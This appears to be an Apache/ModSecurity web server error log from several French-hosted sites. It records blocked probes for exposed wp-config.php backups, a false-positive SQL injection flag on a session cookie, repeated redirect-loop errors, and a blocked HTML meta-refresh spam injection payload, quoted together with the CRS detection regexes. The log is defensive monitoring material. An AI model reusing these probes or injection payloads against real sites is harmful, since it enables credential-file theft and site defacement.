[Mon May 11 19:54:29.602608 2026] [security2:error] [pid 1502013:tid 1502043] [client 92.208.199.142:38620] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: dd87d91a0cdac4bb5d1233643577b8ce||1778523869||1778523509"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.la-grande-fabrique.com"] [uri "/favicon.ico"] [unique_id "agIX1ZYn-x0CHsbEbP2YawAAAJA"], referer: http://www.la-grande-fabrique.com/
[Mon May 11 19:54:29.602837 2026] [security2:error] [pid 1502013:tid 1502043] [client 92.208.199.142:38620] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.la-grande-fabrique.com"] [uri "/favicon.ico"] [unique_id "agIX1ZYn-x0CHsbEbP2YawAAAJA"], referer: http://www.la-grande-fabrique.com/
[Mon May 11 19:54:29.603797 2026] [security2:error] [pid 1502013:tid 1502043] [client 92.208.199.142:38620] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "www.la-grande-fabrique.com"] [uri "/favicon.ico"] [unique_id "agIX1ZYn-x0CHsbEbP2YawAAAJA"], referer: http://www.la-grande-fabrique.com/
[Mon May 11 19:54:30.835394 2026] [security2:error] [pid 1516058:tid 1516106] [client 172.212.217.10:37477] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backup.wp-config.php"] [unique_id "agIX1iMeXtzav-mi9SycFwAAANA"]
[Mon May 11 19:54:30.835558 2026] [security2:error] [pid 1516058:tid 1516106] [client 172.212.217.10:37477] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backup.wp-config.php"] [unique_id "agIX1iMeXtzav-mi9SycFwAAANA"]
[Mon May 11 19:54:30.843640 2026] [core:error] [pid 1516058:tid 1516106] [client 172.212.217.10:37477] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:30.843837 2026] [security2:error] [pid 1516058:tid 1516106] [client 172.212.217.10:37477] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/backup.wp-config.php"] [unique_id "agIX1iMeXtzav-mi9SycFwAAANA"]
[Mon May 11 19:54:33.004621 2026] [core:error] [pid 1516058:tid 1516094] [client 172.212.217.10:62895] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:33.004652 2026] [core:error] [pid 1516058:tid 1516094] [client 172.212.217.10:62895] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:33.721269 2026] [core:error] [pid 1502013:tid 1502033] [client 172.212.217.10:36691] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:33.721297 2026] [core:error] [pid 1502013:tid 1502033] [client 172.212.217.10:36691] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:34.972732 2026] [core:error] [pid 1516058:tid 1516096] [client 172.212.217.10:40333] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:34.972763 2026] [core:error] [pid 1516058:tid 1516096] [client 172.212.217.10:40333] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:36.192267 2026] [core:error] [pid 1516058:tid 1516092] [client 172.212.217.10:62869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:36.192306 2026] [core:error] [pid 1516058:tid 1516092] [client 172.212.217.10:62869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:37.376940 2026] [core:error] [pid 1534836:tid 1534878] [client 172.212.217.10:37488] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:37.376977 2026] [core:error] [pid 1534836:tid 1534878] [client 172.212.217.10:37488] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:38.575773 2026] [core:error] [pid 1516058:tid 1516099] [client 172.212.217.10:1950] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:38.575796 2026] [core:error] [pid 1516058:tid 1516099] [client 172.212.217.10:1950] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:40.519351 2026] [core:error] [pid 1534836:tid 1534883] [client 172.212.217.10:16141] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:40.519380 2026] [core:error] [pid 1534836:tid 1534883] [client 172.212.217.10:16141] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:44.032116 2026] [core:error] [pid 1516058:tid 1516107] [client 172.212.217.10:61632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:44.032141 2026] [core:error] [pid 1516058:tid 1516107] [client 172.212.217.10:61632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:44.215981 2026] [proxy_fcgi:error] [pid 1511173:tid 1511187] [client 45.94.31.112:52185] AH01071: Got error 'Primary script unknown'
[Mon May 11 19:54:47.074590 2026] [core:error] [pid 1534836:tid 1534877] [client 172.212.217.10:37444] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:47.074622 2026] [core:error] [pid 1534836:tid 1534877] [client 172.212.217.10:37444] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:48.031957 2026] [:error] [pid 1501831:tid 1501855] [client 212.112.100.193:55243] File does not exist: /home/domaine1/public_html/xmlrpc.php
[Mon May 11 19:54:48.032043 2026] [:error] [pid 1501831:tid 1501855] [client 212.112.100.193:55243] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 19:54:51.934727 2026] [core:error] [pid 1516058:tid 1516097] [client 172.212.217.10:62891] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:51.934766 2026] [core:error] [pid 1516058:tid 1516097] [client 172.212.217.10:62891] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:53.509750 2026] [core:error] [pid 1502013:tid 1502034] [client 172.212.217.10:36684] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:53.509778 2026] [core:error] [pid 1502013:tid 1502034] [client 172.212.217.10:36684] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:57.170244 2026] [core:error] [pid 1511173:tid 1511194] [client 172.212.217.10:24479] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:54:57.170282 2026] [core:error] [pid 1511173:tid 1511194] [client 172.212.217.10:24479] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:05.474759 2026] [core:error] [pid 1501831:tid 1501845] [client 172.212.217.10:16137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:05.474798 2026] [core:error] [pid 1501831:tid 1501845] [client 172.212.217.10:16137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:09.798642 2026] [core:error] [pid 1511173:tid 1511187] [client 172.212.217.10:24500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:09.798765 2026] [core:error] [pid 1511173:tid 1511187] [client 172.212.217.10:24500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:13.967900 2026] [core:error] [pid 1501831:tid 1501840] [client 172.212.217.10:62892] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:13.968009 2026] [core:error] [pid 1501831:tid 1501840] [client 172.212.217.10:62892] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:15.580074 2026] [core:error] [pid 1501831:tid 1501834] [client 172.212.217.10:36676] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:15.581070 2026] [core:error] [pid 1501831:tid 1501834] [client 172.212.217.10:36676] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:18.244245 2026] [core:error] [pid 1534836:tid 1534889] [client 172.212.217.10:1964] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:18.244280 2026] [core:error] [pid 1534836:tid 1534889] [client 172.212.217.10:1964] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:20.978401 2026] [core:error] [pid 1534836:tid 1534873] [client 172.212.217.10:37465] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:20.978424 2026] [core:error] [pid 1534836:tid 1534873] [client 172.212.217.10:37465] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:23.211126 2026] [core:error] [pid 1516058:tid 1516099] [client 172.212.217.10:61688] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:23.211175 2026] [core:error] [pid 1516058:tid 1516099] [client 172.212.217.10:61688] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:23.261627 2026] [security2:error] [pid 1534836:tid 1534871] [client 43.156.34.42:54836] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "labaujue.com"] [uri "/"] [unique_id "agIYC9eaRXe5lR8y0ZN_ogAAAUE"]
[Mon May 11 19:55:26.691968 2026] [core:error] [pid 1511173:tid 1511187] [client 172.212.217.10:1924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:26.692002 2026] [core:error] [pid 1511173:tid 1511187] [client 172.212.217.10:1924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:29.986949 2026] [security2:error] [pid 1516058:tid 1516100] [client 172.212.217.10:62861] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/new-wp-config.php"] [unique_id "agIYESMeXtzav-mi9SycWQAAAMo"]
[Mon May 11 19:55:29.987116 2026] [security2:error] [pid 1516058:tid 1516100] [client 172.212.217.10:62861] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/new-wp-config.php"] [unique_id "agIYESMeXtzav-mi9SycWQAAAMo"]
[Mon May 11 19:55:29.987561 2026] [core:error] [pid 1516058:tid 1516100] [client 172.212.217.10:62861] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:29.993619 2026] [security2:error] [pid 1516058:tid 1516100] [client 172.212.217.10:62861] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/new-wp-config.php"] [unique_id "agIYESMeXtzav-mi9SycWQAAAMo"]
[Mon May 11 19:55:30.813047 2026] [security2:error] [pid 1501831:tid 1501848] [client 43.156.34.42:39352] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agIYElNddpkriGUb6ZViLQAAAQ8"], referer: http://labaujue.com
[Mon May 11 19:55:31.071436 2026] [core:error] [pid 1511173:tid 1511183] [client 172.212.217.10:24466] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:31.071472 2026] [core:error] [pid 1511173:tid 1511183] [client 172.212.217.10:24466] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:33.445603 2026] [core:error] [pid 1501831:tid 1501847] [client 172.212.217.10:36675] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:33.445642 2026] [core:error] [pid 1501831:tid 1501847] [client 172.212.217.10:36675] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:36.251528 2026] [core:error] [pid 1501883:tid 1501891] [client 172.212.217.10:37449] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:36.251565 2026] [core:error] [pid 1501883:tid 1501891] [client 172.212.217.10:37449] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:37.531404 2026] [core:error] [pid 1501831:tid 1501835] [client 172.212.217.10:36681] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:37.531443 2026] [core:error] [pid 1501831:tid 1501835] [client 172.212.217.10:36681] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:38.178330 2026] [core:error] [pid 1502013:tid 1502043] [client 172.212.217.10:62860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:38.178544 2026] [core:error] [pid 1502013:tid 1502043] [client 172.212.217.10:62860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:38.788588 2026] [core:error] [pid 1501883:tid 1501908] [client 172.212.217.10:36729] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:38.788730 2026] [core:error] [pid 1501883:tid 1501908] [client 172.212.217.10:36729] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:55:48.375912 2026] [security2:error] [pid 1501883:tid 1501888] [client 27.78.84.116:52764] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJDP5Q_-MBliRCAxTngAAAAM"]
[Mon May 11 19:55:48.378106 2026] [security2:error] [pid 1501883:tid 1501888] [client 27.78.84.116:52764] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJDP5Q_-MBliRCAxTngAAAAM"]
[Mon May 11 19:55:48.378480 2026] [security2:error] [pid 1501883:tid 1501888] [client 27.78.84.116:52764] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJDP5Q_-MBliRCAxTngAAAAM"]
[Mon May 11 19:55:48.379188 2026] [security2:error] [pid 1501883:tid 1501888] [client 27.78.84.116:52764] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJDP5Q_-MBliRCAxTngAAAAM"]
